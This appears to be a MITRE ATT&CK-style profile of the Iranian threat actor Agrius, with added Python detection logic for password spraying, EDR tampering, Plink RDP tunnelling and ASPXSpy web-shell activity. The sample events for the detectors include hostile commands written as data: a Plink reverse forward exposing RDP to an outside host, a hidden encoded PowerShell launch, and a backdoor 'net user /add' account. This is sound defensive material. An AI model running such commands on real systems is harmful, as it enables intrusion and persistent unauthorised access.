
Agrius

Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets.(Citation: SentinelOne Agrius 2021)(Citation: CheckPoint Agrius 2023) Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).(Citation: Microsoft Iran Cyber 2023)
ID: G1030
Associated Groups: Pink Sandstorm, AMERICIUM, Agonizing Serpens, BlackShadow
Version: 1.0
Created: 21 May 2024
Last Modified: 29 Aug 2024

Associated Group Descriptions

Name Description
Pink Sandstorm (Citation: Microsoft Threat Actor Naming July 2023)
AMERICIUM (Citation: Microsoft Threat Actor Naming July 2023)
Agonizing Serpens (Citation: Unit42 Agrius 2023)
BlackShadow (Citation: CheckPoint Agrius 2023)

Techniques Used

Domain ID Name Use
Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Agrius used 7zip to archive extracted data in preparation for exfiltration.(Citation: Unit42 Agrius 2023)

Enterprise T1110 .003 Brute Force: Password Spraying

Agrius engaged in password spraying via SMB in victim environments.(Citation: Unit42 Agrius 2023)
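A spray over SMB leaves a distinctive trail in the Security log: Event ID 4625 failures with LogonType 3 (network logon), one source address, many distinct target accounts, and only one or two attempts per account, which keeps the spray under lockout thresholds. The following detection logic is an added example written for this page; it is not code from the Agrius reporting or from ATT&CK. The event records are constructed and reduced to the fields the analytic needs, and the thresholds (10-minute window, at least 5 accounts, at most 2 tries per account) are tuning assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security Event ID 4625 (failed logon) records,
# reduced to the fields this analytic needs. These are not logs from any
# Agrius intrusion; they are made up to exercise the logic.
# LogonType 3 is a network logon, which is what SMB authentication produces.
# SubStatus 0xC000006A = wrong password, 0xC0000064 = account does not exist.
SAMPLE_4625 = [
    # One source, one attempt per account, many accounts: spraying.
    {"ts": "2024-03-01T10:00:01", "src": "10.0.5.23", "user": "a.cohen",   "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:00:03", "src": "10.0.5.23", "user": "b.levi",    "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:00:04", "src": "10.0.5.23", "user": "c.mizrahi", "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:00:06", "src": "10.0.5.23", "user": "d.peretz",  "logon_type": 3, "sub_status": "0xC0000064"},
    {"ts": "2024-03-01T10:00:08", "src": "10.0.5.23", "user": "e.biton",   "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:00:09", "src": "10.0.5.23", "user": "f.dahan",   "logon_type": 3, "sub_status": "0xC000006A"},
    # One user failing repeatedly against their own account: noisy but benign.
    {"ts": "2024-03-01T10:01:00", "src": "10.0.8.4",  "user": "g.katz",    "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:01:05", "src": "10.0.8.4",  "user": "g.katz",    "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:01:10", "src": "10.0.8.4",  "user": "g.katz",    "logon_type": 3, "sub_status": "0xC000006A"},
    {"ts": "2024-03-01T10:01:15", "src": "10.0.8.4",  "user": "g.katz",    "logon_type": 3, "sub_status": "0xC000006A"},
    # A console (LogonType 2) failure: not SMB, dropped by the filter.
    {"ts": "2024-03-01T10:02:00", "src": "10.0.8.9",  "user": "h.azoulay", "logon_type": 2, "sub_status": "0xC000006A"},
]

NETWORK_LOGON = 3
SPRAY_SUBSTATUS = {"0xC000006A", "0xC0000064"}


def detect_password_spraying(events, window=timedelta(minutes=10),
                             min_accounts=5, max_per_account=2):
    """Return {source_ip: sorted list of targeted accounts} for every source
    that fails against at least `min_accounts` distinct accounts inside one
    `window`, with no single account tried more than `max_per_account` times.
    The thresholds are tuning assumptions for this example."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] != NETWORK_LOGON or e["sub_status"] not in SPRAY_SUBSTATUS:
            continue
        by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["user"]))

    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide `start` forward so attempts[start..end] spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_account = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_account[user] += 1
            # Many accounts, each tried only a few times: the spraying shape.
            if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
                flagged[src] = sorted(per_account)
    return flagged


if __name__ == "__main__":
    for src, users in detect_password_spraying(SAMPLE_4625).items():
        print(f"possible password spraying from {src}: {len(users)} accounts -> {', '.join(users)}")
```

The account-failure profile, not the raw failure count, is what separates a spray from a user who has forgotten a password: 10.0.8.4 produces as many failures as the spraying host but against a single account and is left alone. Sub-status 0xC0000064 is included because a spray run from a guessed or scraped user list also hits accounts that do not exist.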

Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

Agrius uses ASPXSpy web shells to enable follow-on command execution via cmd.exe.(Citation: SentinelOne Agrius 2021)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

Agrius has deployed IPsec Helper malware post-exploitation and registered it as a service for persistence.(Citation: SentinelOne Agrius 2021)

Enterprise T1074 .001 Data Staged: Local Data Staging

Agrius has used the folder C:\windows\temp\s\ to stage data for exfiltration.(Citation: Unit42 Agrius 2023)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Agrius used several mechanisms to try to disable security tools. Agrius attempted to modify EDR-related services to disable auto-start on system reboot. Agrius also used a publicly available driver, GMER64.sys, normally used for anti-rootkit functionality, to selectively stop and remove security software processes.(Citation: Unit42 Agrius 2023)
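Both mechanisms in the paragraph above are visible in standard Windows telemetry: a service start-type change is recorded by the Service Control Manager as System log Event ID 7040, and a kernel driver load is recorded by Sysmon Event ID 6. The detection below is an added example written for this page, not code from the Agrius reporting or ATT&CK. The events are constructed and their field names simplified; the protected-service list is an assumption (WinDefend and Sense are the Microsoft Defender Antivirus and Defender for Endpoint service names, ExampleEdrAgent is a placeholder for whichever sensor is deployed).

```python
import ntpath

# Security services whose start type should never silently change. Names are an
# assumption for this example: WinDefend and Sense are the Microsoft Defender
# Antivirus and Defender for Endpoint service names; ExampleEdrAgent is a
# placeholder for the EDR sensor actually deployed.
PROTECTED_SERVICES = {"WinDefend", "Sense", "ExampleEdrAgent"}

# Legitimate drivers known to be loaded by attackers to kill protected processes.
# GMER64.sys is the one named in the Agrius reporting; extend the set (ideally
# with hashes as well as names) from your own intelligence.
ABUSABLE_DRIVERS = {"gmer64.sys"}
SYSTEM_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"

# Constructed sample events (not from the Agrius reporting). Event ID 7040 in the
# System log is the Service Control Manager recording a start-type change; Sysmon
# Event ID 6 records a kernel driver load. Field names are simplified.
SAMPLE_EVENTS = [
    {"channel": "System", "event_id": 7040, "service": "ExampleEdrAgent",
     "old_start": "auto start", "new_start": "disabled", "user": "CORP\\svc_backup"},
    {"channel": "System", "event_id": 7040, "service": "Spooler",
     "old_start": "auto start", "new_start": "disabled", "user": "CORP\\helpdesk"},
    {"channel": "Sysmon", "event_id": 6, "image_loaded": "C:\\Windows\\Temp\\GMER64.sys", "signed": True},
    {"channel": "Sysmon", "event_id": 6, "image_loaded": "C:\\Windows\\System32\\drivers\\tcpip.sys", "signed": True},
]


def check_service_start_change(event):
    """Flag a protected security service being set to 'disabled' or 'demand start'
    (the two wordings Event 7040 uses for a service that will not auto-start)."""
    if event.get("event_id") != 7040:
        return None
    if event["service"] not in PROTECTED_SERVICES:
        return None
    if event["new_start"].lower() in ("disabled", "demand start"):
        return (f"T1562.001 service tamper: {event['service']} changed from "
                f"{event['old_start']} to {event['new_start']} by {event['user']}")
    return None


def check_driver_load(event):
    """Flag a known-abusable driver, or any driver loaded from outside the system
    drivers directory. A 'signed or not' test alone is not enough here: GMER64.sys
    ships with a legitimate anti-rootkit tool and loads on 64-bit Windows, so it
    carries a valid signature, which is precisely why it is useful to an attacker
    who needs kernel access to stop EDR processes."""
    if event.get("event_id") != 6:
        return None
    path = event["image_loaded"]
    name = ntpath.basename(path).lower()
    reasons = []
    if name in ABUSABLE_DRIVERS:
        reasons.append("known abusable driver")
    if not path.lower().startswith(SYSTEM_DRIVER_DIR):
        reasons.append("loaded from outside System32\\drivers")
    if reasons:
        return f"T1562.001 driver load: {path} ({'; '.join(reasons)})"
    return None


def detect_defense_impairment(events):
    """Run both checks over an event stream and return the alert strings in order."""
    alerts = []
    for event in events:
        for check in (check_service_start_change, check_driver_load):
            alert = check(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in detect_defense_impairment(SAMPLE_EVENTS):
        print(line)
```

The path rule matters because the name rule is trivially defeated by renaming the driver file; a driver loading from a temp or user-writable directory is unusual enough to be worth a look regardless of its name, and a hash match against the known GMER64.sys binary would be the robust complement.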

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

Agrius used tools such as Mimikatz to dump LSASS memory to capture credentials in victim environments.(Citation: Unit42 Agrius 2023)

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Agrius dumped the SAM file on victim machines to capture credentials.(Citation: Unit42 Agrius 2023)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

Agrius tunnels RDP traffic through deployed web shells to access victim environments via compromised accounts.(Citation: SentinelOne Agrius 2021) Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.(Citation: Unit42 Agrius 2023)
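Tunneling RDP through Plink gives two observable artifacts. The first is the Plink command line itself, which Sysmon Event ID 1 captures: a -R (remote) or -L (local) port forward whose destination port is 3389. The second is more durable, because it survives renaming the binary: when the forward terminates on the victim host, the RDP server sees the client connect from the host itself, so the Security log shows Event ID 4624 with LogonType 10 (RemoteInteractive) and a loopback source address. The following checks are an added example written for this page, not code from the Agrius reporting or ATT&CK; the events are constructed and their field names simplified.

```python
import ipaddress
import ntpath

RDP_PORT = "3389"

# Constructed sample events (not from the Agrius reporting). Sysmon Event ID 1 is
# process creation with the full command line; Security Event ID 4624 with
# LogonType 10 is a RemoteInteractive (RDP) logon carrying the client address.
SAMPLE_EVENTS = [
    # Plink publishing the local RDP port on an attacker SSH server.
    {"event_id": 1, "image": "C:\\Users\\Public\\plink.exe",
     "cmdline": "plink.exe -N -R 0.0.0.0:12445:127.0.0.1:3389 user@203.0.113.10 -pw s3cret"},
    # Ordinary administrative SSH use of Plink: no forward, not flagged.
    {"event_id": 1, "image": "C:\\Program Files\\PuTTY\\plink.exe",
     "cmdline": "plink.exe -ssh -batch admin@10.0.0.5 uptime"},
    # RDP logon whose client is the host itself: the tunnel's endpoint.
    {"event_id": 4624, "logon_type": 10, "user": "CORP\\a.cohen", "src_ip": "127.0.0.1"},
    # Normal RDP from a workstation on the LAN.
    {"event_id": 4624, "logon_type": 10, "user": "CORP\\b.levi", "src_ip": "10.0.4.17"},
    # Loopback but a network logon (type 3), not RDP; not this analytic's concern.
    {"event_id": 4624, "logon_type": 3, "user": "CORP\\c.mizrahi", "src_ip": "::1"},
    # 4624 may carry '-' instead of an address; must not crash the parser.
    {"event_id": 4624, "logon_type": 10, "user": "CORP\\d.peretz", "src_ip": "-"},
]


def forwarded_ports(cmdline):
    """Destination ports of every -L/-R forward in a plink command line.
    A forward spec is [listen_addr:]listen_port:dest_host:dest_port, so the
    destination port is whatever follows the last colon."""
    tokens = cmdline.split()
    ports = []
    for i, tok in enumerate(tokens):
        if tok in ("-L", "-R") and i + 1 < len(tokens):
            ports.append(tokens[i + 1].rsplit(":", 1)[-1])
    return ports


def check_plink_rdp_forward(event):
    """Flag plink.exe forwarding port 3389. Matching on the image name is weak
    (a renamed binary slips past), which is why the loopback check below exists."""
    if event.get("event_id") != 1:
        return None
    if ntpath.basename(event["image"]).lower() != "plink.exe":
        return None
    if RDP_PORT in forwarded_ports(event["cmdline"]):
        return f"T1021.001 plink forwarding RDP: {event['cmdline']}"
    return None


def check_loopback_rdp_logon(event):
    """Flag an RDP (LogonType 10) logon whose client address is loopback: the
    RDP session arrived through a tunnel terminating on this host."""
    if event.get("event_id") != 4624 or event.get("logon_type") != 10:
        return None
    try:
        addr = ipaddress.ip_address(event["src_ip"])
    except ValueError:
        return None  # 4624 can carry '-' or 'LOCAL' as the address
    if addr.is_loopback:
        return f"T1021.001 RDP logon for {event['user']} from loopback {addr}: tunneled RDP"
    return None


def detect_rdp_tunneling(events):
    """Return alert strings for every event that trips either check."""
    alerts = []
    for event in events:
        for check in (check_plink_rdp_forward, check_loopback_rdp_logon):
            alert = check(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in detect_rdp_tunneling(SAMPLE_EVENTS):
        print(line)
```

In an environment where RDP is expected only from jump hosts, the loopback rule can be widened to "LogonType 10 from any address not in the jump-host set", which also covers tunnels whose endpoint is a neighbouring compromised machine rather than the RDP target itself.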

Enterprise T1505 .003 Server Software Component: Web Shell

Agrius typically deploys a variant of the ASPXSpy web shell following initial access via exploitation.(Citation: SentinelOne Agrius 2021)
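Because ASPXSpy runs inside the IIS worker process, the cmd.exe execution described under T1059.003 above appears in process telemetry as w3wp.exe spawning a command interpreter, which a web server almost never does legitimately. The following triage logic over Sysmon Event ID 1 (process creation) records serves both that entry and this one; it is an added example written for this page, not code from the Agrius reporting or ATT&CK. The events are constructed and their fields simplified, and the allow-list of children the IIS worker does spawn (the C# compiler and its helpers during on-demand ASP.NET compilation) is an assumption to be tuned against real baseline data.

```python
import ntpath

# Web server worker processes whose children deserve scrutiny. w3wp.exe is the
# IIS worker that hosts ASPX pages, and therefore an ASPXSpy web shell.
WEB_WORKERS = {"w3wp.exe"}

# Interpreters an operator drives from a web shell; any of these as a child of
# the worker is high severity on its own.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

# Children the IIS worker spawns legitimately, chiefly on-demand ASP.NET
# compilation. This allow-list is an assumption for the example; tune it
# against a baseline of your own servers.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe", "conhost.exe"}

# Constructed Sysmon Event ID 1 records (not from the Agrius reporting).
W3WP = "C:\\Windows\\System32\\inetsrv\\w3wp.exe"
SAMPLE_SYSMON_1 = [
    {"image": "C:\\Windows\\System32\\cmd.exe", "parent_image": W3WP,
     "cmdline": 'cmd.exe /c "whoami & ipconfig /all"', "user": "IIS APPPOOL\\DefaultAppPool"},
    {"image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", "parent_image": W3WP,
     "cmdline": 'csc.exe /noconfig /fullpaths @"C:\\Windows\\Temp\\a1b2c3.cmdline"',
     "user": "IIS APPPOOL\\DefaultAppPool"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": W3WP,
     "cmdline": "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA", "user": "IIS APPPOOL\\DefaultAppPool"},
    {"image": "C:\\Windows\\System32\\net.exe", "parent_image": W3WP,
     "cmdline": "net user backup_svc P@ss1 /add", "user": "IIS APPPOOL\\DefaultAppPool"},
    # A user's own shell from Explorer: not a web worker child, ignored.
    {"image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "cmd.exe", "user": "CORP\\a.cohen"},
]


def classify_child(event):
    """Severity for one process-creation event: 'high' for an interpreter
    spawned by a web worker, 'medium' for any other unexpected child,
    None for non-worker parents and allow-listed children."""
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent not in WEB_WORKERS:
        return None
    child = ntpath.basename(event["image"]).lower()
    if child in INTERPRETERS:
        return "high"
    if child in EXPECTED_CHILDREN:
        return None
    return "medium"


def detect_webshell_execution(events):
    """Return (severity, user, cmdline) for every suspicious worker child, in order."""
    hits = []
    for event in events:
        severity = classify_child(event)
        if severity:
            hits.append((severity, event["user"], event["cmdline"]))
    return hits


if __name__ == "__main__":
    for severity, user, cmdline in detect_webshell_execution(SAMPLE_SYSMON_1):
        print(f"[{severity}] {user}: {cmdline}")
```

The parent/child relationship is the signal; the web shell's own file name or URL path is not needed, so the same rule catches a renamed or modified ASPXSpy variant as long as the operator uses it to run commands.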

Enterprise T1078 .002 Valid Accounts: Domain Accounts

Agrius attempted to acquire valid credentials for victim environments through various means to enable follow-on lateral movement.(Citation: Unit42 Agrius 2023)

Software

ID Name References Techniques
S1137 Moneybird (Citation: CheckPoint Agrius 2023) Embedded Payloads, Data Encrypted for Impact
S1133 Apostle (Citation: SentinelOne Agrius 2021) Scheduled Task, Deobfuscate/Decode Files or Information, Clear Windows Event Logs, Execution Guardrails, Process Discovery, Data Encrypted for Impact, Data Destruction, File Deletion, Disk Content Wipe, System Shutdown/Reboot
S0073 ASPXSpy (Citation: Dell TG-3390) (Citation: SentinelOne Agrius 2021) Web Shell
S1135 MultiLayer Wiper (Citation: Unit42 Agrius 2023) Scheduled Task, Embedded Payloads, Disk Structure Wipe, Stored Data Manipulation, Timestomp, Clear Windows Event Logs, Indicator Removal, File and Directory Discovery, Disable or Modify Tools, Windows Command Shell, Data Destruction, File Deletion, Inhibit System Recovery, System Shutdown/Reboot
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: Unit42 Agrius 2023) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S1132 IPsec Helper (Citation: SentinelOne Agrius 2021) Encrypted/Encoded File, Data from Local System, Time Based Evasion, Modify Registry, Indicator Removal, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Lateral Tool Transfer, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Visual Basic, Service Execution
S0590 NBTscan (Citation: Debian nbtscan Nov 2019) (Citation: FireEye APT39 Jan 2019) (Citation: SecTools nbtscan June 2003) (Citation: Symantec Waterbug Jun 2019) (Citation: Unit42 Agrius 2023) System Owner/User Discovery, Network Sniffing, System Network Configuration Discovery, Remote System Discovery, Network Service Discovery
S1136 BFG Agonizer (Citation: Unit42 Agrius 2023) Disk Structure Wipe, Compromise Host Software Binary, Inhibit System Recovery, System Shutdown/Reboot
S1134 DEADWOOD (Citation: SentinelOne Agrius 2021) Embedded Payloads, Disk Structure Wipe, Encrypted/Encoded File, Deobfuscate/Decode Files or Information, Masquerade Task or Service, Account Access Removal, Data Destruction, Service Execution, System Time Discovery, Disk Content Wipe
